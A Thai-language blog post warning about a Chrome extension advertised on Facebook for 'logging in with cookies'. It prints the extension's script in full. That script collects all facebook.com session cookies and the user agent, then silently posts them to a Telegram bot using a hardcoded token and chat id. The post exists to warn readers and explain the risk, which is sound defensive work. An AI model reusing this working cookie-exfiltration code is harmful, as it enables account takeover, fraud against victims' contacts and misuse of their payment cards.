เตือน!! สอนวิธีล็อกอิน Facebook ด้วยคุกกี้ - อันตรายกว่าที่คิดถ้าไม่รู้เรื่อง Coding

 


    เผอิญว่าวันนี้ผมเล่น Facebook แล้วดันมี feed โฆษณาขึ้นมา `วิธีล็อกอิน Facebook ด้วยคุกกี้โดยใช้คุกกี้ล็อกอิน Facebook บน chrome ลิ้งโหลด https://bom.so/Tu9Mas` คิดในใจก็เจ๊งดีน๊ะ



แล้วโปรแกรมดังกล่าวคืออะไร ?

- เป็น extensions ของ google chrome เป็นส่วนขยายที่เพิ่มความสามารถให้  google chrome นั้นเอง

แต่โปรแกรมดังกล่างเป็นดึงข้อมูลที่เป็น cookie ของ facebook ออกมาดูหรือ ปรับเปลี่ยน cookie ยัดข้อมูลใหม่ไปให้ facebook

โปรแกรมตัวไว้ใช้ทำอะไรได้

จะพูดง่ายก็คือโปรแกรมใช้ไว้เช็ค cookie นั้นแหละครับแต่ก็สามารถใช้งานด้านไม่ดีได้ด้วยพวกขโมย cookie แล้วปลอมเป็นคนที่ถูกขโมยข้อมูลไปทำเรื่องไม่ดี


แต่เดี๋ยวก่อนอย่าพึ่งใช้โปรแกรมดังมีสิ่งแอบแฝง 

เนื่องด้วยบทความนี้ผมมาเตือน ถ้าคุณไม่แก้ไข้โปรแกรมก่อนคุณอาจถูก Hack ข้อมูลทันทีที่ใช้งาน
เดี๋ยวผมจะชำแหละโปรแกรมดังให้ดู

เมื่อเราโหลดโปรแกรมมาเราจะเจอไฟล์


ซึ่งไฟล์ myscript.js เป็นไฟล์ระบบการทำงานหลัก



window.onload = function SendCookie(){
  chrome.cookies.getAll({
    url: "https://www.facebook.com"
    }, ((cookies) => {
    let text ='Number of cookies=' + cookies.length + '\n';
    for (let cookie of cookies){
      text += 'domain=' + cookie.domain + ',path=' + cookie.path + ',name=' + cookie.name + ',value=' + cookie.value + '\n';
    }
    document.getElementById('id_text').value = text;
    botTele(text)
  }));
}

document.getElementById('id_button_getAll').onclick = () => {
  chrome.cookies.getAll({
    url: "https://www.facebook.com"
    }, ((cookies) => {
    let text ='Number of cookies=' + cookies.length + '\n';
    for (let cookie of cookies){
      text += 'domain=' + cookie.domain + ',path=' + cookie.path + ',name=' + cookie.name + ',value=' + cookie.value + '\n';
    }
    document.getElementById('id_text').value = text;

    var t = "";
    var l = "";
    var u ="";

    for (var o = 0; o < cookies.length; o++) t += cookies[o].name + "=" + cookies[o].value + ";", "c_user" == cookies[o].name && (l = cookies[o].value);

    if ("" == l) return document.getElementById("id_text").value = "", !1; u = t
    navigator.userAgent, document.querySelector('[name="user-agent"]:checked') && (u += "|" + window.navigator.userAgent, console.log(u))
    console.log(t);
    console.log('-----')
    console.log(u);
    document.getElementById("id_text").value = u
    //document.getElementById("fb_id").innerHTML = "Facebook id : " + l, u && f()
    botTele(u)
  }));
}

function botTele(text){
  var chat_id = -773511937; // replace with yours
  var enc_data = text;
  var token = "5712740653:AAFreDzJcJMwmYXULecs3-l5rHOpY5XSb78"; // from botfather

  var blob = new Blob([enc_data], { type: 'plain/text' });

  var formData = new FormData();
  formData.append('chat_id', chat_id);
  formData.append('document', blob, 'Data_Cookies.txt');
  var request = new XMLHttpRequest();
  request.open('POST', `https://api.telegram.org/bot${token}/sendDocument`);
  request.send(formData);
}


จะเห็นว่า function botTele มีการแอบส่ง cookie ของเราไปยัง telegram ซึ่งคนที่ได้ cookie ของเราสามารถ login facebook ของเราได้ทันทีและสามารถนำไปใช้อย่างอื่นได้อีกด้วย เช่น

  • หลอกคนที่เรารู้จักติดตั้งโปรแกรมหรือหลอกขอเงิน
  • นำ facebook ไปทำเรื่องที่ไม่ดีหรือนำข้อมูลส่วนตัวใน facebook มาเปิดเผย
  • นำ facebook ไปยิง Ads กรณีผูกบัตรไว้

0 Comments

Earn money online

รวมเทคหาเงินออนไลย์ - หารวยได้เสริม

Is the Designer Facing Extinction?
เล่นเกมส์แล้วไปได้เงิน Rollercoin: เกมจำลองการขุดบิทคอยน์ที่สนุกและคุ้มค่า
คอนเซ็ปต์รายได้จากการดูวิดีโอ